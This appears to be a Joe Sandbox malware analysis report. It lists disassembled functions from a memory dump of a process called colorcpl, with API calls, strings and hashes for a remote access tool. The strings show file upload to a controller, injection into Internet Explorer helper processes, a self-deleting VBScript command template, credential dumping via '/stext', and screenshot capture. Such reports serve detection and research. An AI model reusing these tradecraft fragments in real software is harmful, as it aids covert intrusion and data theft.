                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                              • API String ID: 1332880857-3714951968
                                                              • Opcode ID: acb8f33ad0000c9100c027c6a8400be8b6ff479e0772e9d6ac9e7337b6d94378
                                                              • Instruction ID: c208e12903445fd49ba8960926ecbe638fd4a085365c40266eeb855bd59e38ac
                                                              • Opcode Fuzzy Hash: acb8f33ad0000c9100c027c6a8400be8b6ff479e0772e9d6ac9e7337b6d94378
                                                              • Instruction Fuzzy Hash: 5B815F3520A3459FE728EB55D850EEFB7ECAFD4304F10492EE5868A190EF30A90DDB52
                                                              Function 030AB344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 030AB38F
                                                              • GetCursorPos.USER32(?), ref: 030AB39E
                                                              • SetForegroundWindow.USER32(?), ref: 030AB3A7
                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 030AB3C1
                                                              • Shell_NotifyIconA.SHELL32(00000002,03101AE0), ref: 030AB412
                                                              • ExitProcess.KERNEL32 ref: 030AB41A
                                                              • CreatePopupMenu.USER32 ref: 030AB420
                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 030AB435
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                              • String ID: Close
                                                              • API String ID: 1657328048-3535843008
                                                              • Opcode ID: e0a363f1884b20b05944a3dcba67b36ce74d63e7345c6adeba0148babb7feb79
                                                              • Instruction ID: 248bbc0145c29327d4a6d962eee649fbe3029c53c4ec7da0389eb54c06a20322
                                                              • Opcode Fuzzy Hash: e0a363f1884b20b05944a3dcba67b36ce74d63e7345c6adeba0148babb7feb79
                                                              • Instruction Fuzzy Hash: 03213D36202549FFDB09AFB8FC0DA6D7FB5EB18701F084524F506A8468D7BA99509B24
                                                              Function 030D3268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: f78d1193a72a0d2afc336d8f1f256a902973b533ef057ac30f52baa2ca6266f2
                                                              • Instruction ID: 32acd758a1d59e8f7733160e01edd965ab863e8cf8c7d7fc014aa7eebcaa89ab
                                                              • Opcode Fuzzy Hash: f78d1193a72a0d2afc336d8f1f256a902973b533ef057ac30f52baa2ca6266f2
                                                              • Instruction Fuzzy Hash: 86B1A279A023059FDB11DF68C880BEEFBF5BF48300F1845ADE599AB241DB75A841CB61
                                                              Function 030DE4A6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 030DE4EA
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD6FF
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD711
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD723
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD735
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD747
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD759
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD76B
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD77D
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD78F
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7A1
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7B3
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7C5
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7D7
                                                              • _free.LIBCMT ref: 030DE4DF
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030DE501
                                                              • _free.LIBCMT ref: 030DE516
                                                              • _free.LIBCMT ref: 030DE521
                                                              • _free.LIBCMT ref: 030DE543
                                                              • _free.LIBCMT ref: 030DE556
                                                              • _free.LIBCMT ref: 030DE564
                                                              • _free.LIBCMT ref: 030DE56F
                                                              • _free.LIBCMT ref: 030DE5A7
                                                              • _free.LIBCMT ref: 030DE5AE
                                                              • _free.LIBCMT ref: 030DE5CB
                                                              • _free.LIBCMT ref: 030DE5E3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: e7fb6986b5da526662e2cff91756806091639532cbcdb682c08f940c946b7fc8
                                                              • Instruction ID: efb6eb1f34edd8febb14c7e92a514f47ff26305bb81026e69cd7547c169cef60
                                                              • Opcode Fuzzy Hash: e7fb6986b5da526662e2cff91756806091639532cbcdb682c08f940c946b7fc8
                                                              • Instruction Fuzzy Hash: 0A31A3756023059FEB61EA38D948B9AB3E8FF40391F5994A9E488DF150EF30E940CB21
                                                              Function 03097BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 03097D1F
                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 03097D57
                                                              • __aulldiv.LIBCMT ref: 03097D89
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 03097EAC
                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 03097EC7
                                                              • CloseHandle.KERNEL32(00000000), ref: 03097FA0
                                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 03097FEA
                                                              • CloseHandle.KERNEL32(00000000), ref: 03098038
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldiv
                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                              • API String ID: 1656873915-2596673759
                                                              • Opcode ID: f9f5e0c9969aa2191cbfc4de4da6e4eecd5dbe6aeb336bb2058597d6f645925c
                                                              • Instruction ID: 0eb2ad049ace3884bfe5640ec391017be92f13882eb9ab619c4440a0e3778cf1
                                                              • Opcode Fuzzy Hash: f9f5e0c9969aa2191cbfc4de4da6e4eecd5dbe6aeb336bb2058597d6f645925c
                                                              • Instruction Fuzzy Hash: F6B1E23560A344AFEB58FB64C890BEFB7E9AFC4610F40491EF4895B290EF309905DB42
                                                              Function 0309DE34 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 223processsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,03102248,03101FFC,?,00000001), ref: 0309DE4E
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0309DE79
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0309DE95
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0309DF14
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0309DF23
                                                                • Part of subcall function 030A9F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 030A9F9C
                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0309E047
                                                              • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0309E133
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                              • API String ID: 193334293-1743721670
                                                              • Opcode ID: dcc142cd2a14d232938beee231b6fbb931da061e33f41b5e4818e72759c4541a
                                                              • Instruction ID: 2e98d3ce0edd607114437e7239a014d691f301e4a870e852bcc3edb1e094486c
                                                              • Opcode Fuzzy Hash: dcc142cd2a14d232938beee231b6fbb931da061e33f41b5e4818e72759c4541a
                                                              • Instruction Fuzzy Hash: FE81403420A3459FEE58FBA0D860EEFB7E8AFD4640F40091EE5864B1A1EF31994DD752
                                                              Function 030DD7E0 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: da97825020658e4fc55bc3ac3d76ad825c1a5a17e5a84147288e8a8f640c8c2b
                                                              • Instruction ID: a99dc484122b80062a21247377daf2bbfbcb072d4e50fc5719ce56bbb5ce2f8d
                                                              • Opcode Fuzzy Hash: da97825020658e4fc55bc3ac3d76ad825c1a5a17e5a84147288e8a8f640c8c2b
                                                              • Instruction Fuzzy Hash: 10C15676E41304AFDB20DBA8CC42FEEB7F8EF48715F154155FA48EB281D67099458B60
                                                              Function 030A1899 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 417sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 030A18B2
                                                                • Part of subcall function 030A9959: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,030F9654,0309BDCB,.vbs,?,?,?,?,?,03102200), ref: 030A9980
                                                                • Part of subcall function 030A68A6: CloseHandle.KERNEL32(030940D5,?,?,030940D5,030F2E24), ref: 030A68BC
                                                                • Part of subcall function 030A68A6: CloseHandle.KERNEL32(030F2E24,?,?,030940D5,030F2E24), ref: 030A68C5
                                                              • Sleep.KERNEL32(0000000A,030F2E24), ref: 030A1A01
                                                              • Sleep.KERNEL32(0000000A,030F2E24,030F2E24), ref: 030A1AA3
                                                              • Sleep.KERNEL32(0000000A,030F2E24,030F2E24,030F2E24), ref: 030A1B42
                                                              • DeleteFileW.KERNEL32(00000000,030F2E24,030F2E24,030F2E24), ref: 030A1B9F
                                                              • DeleteFileW.KERNEL32(00000000,030F2E24,030F2E24,030F2E24), ref: 030A1BCF
                                                              • DeleteFileW.KERNEL32(00000000,030F2E24,030F2E24,030F2E24), ref: 030A1C05
                                                              • Sleep.KERNEL32(000001F4,030F2E24,030F2E24,030F2E24), ref: 030A1C25
                                                              • Sleep.KERNEL32(00000064), ref: 030A1C63
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcess
                                                              • String ID: /stext "
                                                              • API String ID: 2485855082-3856184850
                                                              • Opcode ID: c3885dff7e9b6b4c06ddb9dc271b0622a1ae1a110e73682124e65bcf715e60eb
                                                              • Instruction ID: 2321b05af6a664cc90a7c3bb6cc3eb8d3c8ce56277ebc31170ef9c4bae299fba
                                                              • Opcode Fuzzy Hash: c3885dff7e9b6b4c06ddb9dc271b0622a1ae1a110e73682124e65bcf715e60eb
                                                              • Instruction Fuzzy Hash: C7F1233560A3455FEB2DFBA4D8A0BEFB3D5AFD4200F50091EE08A4A191EF709A4DD652
                                                              Function 030A3606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 65535$udp
                                                              • API String ID: 0-1267037602
                                                              • Opcode ID: 1a0beb9d2260414baff93e862da0165526b5ff0540b9b889965a749ab1dd6acc
                                                              • Instruction ID: 1b7377a0b6987c433e55bb84ac935da2581758e54dcfbaca311d0ab90757bc4f
                                                              • Opcode Fuzzy Hash: 1a0beb9d2260414baff93e862da0165526b5ff0540b9b889965a749ab1dd6acc
                                                              • Instruction Fuzzy Hash: 9651D8BD607B059BD7B0DA9CF449B7FB7D4AF84A81F0C49ADF8819A680D725C8408A52
                                                              Function 0309C3B8 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A12B5: TerminateProcess.KERNEL32(00000000,031021E8,0309E2B2), ref: 030A12C5
                                                                • Part of subcall function 030A12B5: WaitForSingleObject.KERNEL32(000000FF), ref: 030A12D8
                                                                • Part of subcall function 030A20E8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,03102200), ref: 030A2104
                                                                • Part of subcall function 030A20E8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 030A211D
                                                                • Part of subcall function 030A20E8: RegCloseKey.KERNEL32(00000000), ref: 030A2128
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0309C412
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309C571
                                                              • ExitProcess.KERNEL32 ref: 0309C57D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                              • API String ID: 1913171305-2411266221
                                                              • Opcode ID: b05d88e61a9d775c53edb9d77b485eccf4e15da7feb9e40e3aab4616002737b3
                                                              • Instruction ID: 57aa8d7d83a78e55cd509a3bdafa807bfd941da0494d45cc89280d5b7f199e28
                                                              • Opcode Fuzzy Hash: b05d88e61a9d775c53edb9d77b485eccf4e15da7feb9e40e3aab4616002737b3
                                                              • Instruction Fuzzy Hash: 43414E39A122196FEF18F7A5DC64DEE7779AF94610F00016BE106AF091EF305E4ADA90
                                                              Function 030C85DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C8632
                                                              • GetLastError.KERNEL32(?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C863F
                                                              • __dosmaperr.LIBCMT ref: 030C8646
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C8672
                                                              • GetLastError.KERNEL32(?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C867C
                                                              • __dosmaperr.LIBCMT ref: 030C8683
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,03091D35,?), ref: 030C86C6
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C86D0
                                                              • __dosmaperr.LIBCMT ref: 030C86D7
                                                              • _free.LIBCMT ref: 030C86E3
                                                              • _free.LIBCMT ref: 030C86EA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                              • String ID:
                                                              • API String ID: 2441525078-0
                                                              • Opcode ID: ccaacae7d47af187c8d88dd90e7d8304bb4aadd6c11cb554e00c1bfc127e542c
                                                              • Instruction ID: 0e215005218fdef5e682997e413fa3606f6d1ae8c76f8ffae9d086064d3ef972
                                                              • Opcode Fuzzy Hash: ccaacae7d47af187c8d88dd90e7d8304bb4aadd6c11cb554e00c1bfc127e542c
                                                              • Instruction Fuzzy Hash: 7A31C27991238EBFCF11EFA4DC489AF7BA8EF44760B14815DF8115A250DB35C910CB65
                                                              Function 03095480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 0309549F
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0309554F
                                                              • TranslateMessage.USER32(?), ref: 0309555E
                                                              • DispatchMessageA.USER32(?), ref: 03095569
                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,03101F10), ref: 03095621
                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 03095659
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslate
                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                              • API String ID: 2460878853-749203953
                                                              • Opcode ID: a076877d64bceb6518960a7c7f0c45c5358c2d04d4925ee681675eaf7d998e5a
                                                              • Instruction ID: ea1293e43f9e6a5c6bc300fb0b8ba5c0c0cf27f9293c073c907c042386851bce
                                                              • Opcode Fuzzy Hash: a076877d64bceb6518960a7c7f0c45c5358c2d04d4925ee681675eaf7d998e5a
                                                              • Instruction Fuzzy Hash: BF410479A063056FEF04FB75DC648AF7BE9ABC5610F00091EF5428B691DF348A05D751
                                                              Function 030A8AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AD2
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AE9
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AF6
                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B05
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B16
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B19
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 75ee2c3f00dedd2aa541cf77ac7809ec83d2d3fe6ac79b112e83c94495de122c
                                                              • Instruction ID: 8c2933385591efe005ac80d733c6614719c12872904d07efc27f8249f61aae9c
                                                              • Opcode Fuzzy Hash: 75ee2c3f00dedd2aa541cf77ac7809ec83d2d3fe6ac79b112e83c94495de122c
                                                              • Instruction Fuzzy Hash: DF112571B0312C6FD610FBA8FC89DBF3FACDF52AA27000056FA059A140DB294C059AB1
                                                              Function 030D5631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 030D5645
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030D5651
                                                              • _free.LIBCMT ref: 030D565C
                                                              • _free.LIBCMT ref: 030D5667
                                                              • _free.LIBCMT ref: 030D5672
                                                              • _free.LIBCMT ref: 030D567D
                                                              • _free.LIBCMT ref: 030D5688
                                                              • _free.LIBCMT ref: 030D5693
                                                              • _free.LIBCMT ref: 030D569E
                                                              • _free.LIBCMT ref: 030D56AC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 350552d9552a2a8299357a19205bfba92709b851e853bae24b67572efcd50b80
                                                              • Instruction ID: d486db81709bcaff33278a278d68278191bdeba082fc67d6b53b43a4c3550bad
                                                              • Opcode Fuzzy Hash: 350552d9552a2a8299357a19205bfba92709b851e853bae24b67572efcd50b80
                                                              • Instruction Fuzzy Hash: 2211A77D20230CAFCB01EF54C844EDD3BA5FF44391B029495BA884F121EA31DA509F91
                                                              Function 030A7F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 030A7F6F
                                                              • GdiplusStartup.GDIPLUS(03101668,?,00000000), ref: 030A7FA1
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 030A802D
                                                              • Sleep.KERNEL32(000003E8), ref: 030A80B3
                                                              • GetLocalTime.KERNEL32(?), ref: 030A80BB
                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 030A81AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                              • API String ID: 489098229-3790400642
                                                              • Opcode ID: e7bfd54fc91e23bc2ef1acf82340829bf78584c1ab704f8af1cce613a1a49215
                                                              • Instruction ID: 27735dd0a1a398efe5067305ed0565bc099be39f0fe6763f0c7d921ce8f6afde
                                                              • Opcode Fuzzy Hash: e7bfd54fc91e23bc2ef1acf82340829bf78584c1ab704f8af1cce613a1a49215
                                                              • Instruction Fuzzy Hash: 17516C75A023599FEF58FBF8D864AFD7BA8AF94200F04046AE405AF180EF749E45D790
                                                              Function 030E30E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,030E41DF), ref: 030E3107
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: aaf196b974c9f62695b5bdcbb8aafb92093553953400d47492ed76f9581f8665
                                                              • Instruction ID: a8fdc2b82a92795db634afde306620e936672c6ea016ab91b8213206b9790fd1
                                                              • Opcode Fuzzy Hash: aaf196b974c9f62695b5bdcbb8aafb92093553953400d47492ed76f9581f8665
                                                              • Instruction Fuzzy Hash: 24515779B0260ADFCF44DFA8EA485ACBFF4FB49310F5445C9D481AB654CB369A248B18
                                                              Function 030A59BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 030A5A1A
                                                                • Part of subcall function 030AA20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA228
                                                              • Sleep.KERNEL32(00000064), ref: 030A5A46
                                                              • DeleteFileW.KERNEL32(00000000), ref: 030A5A7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
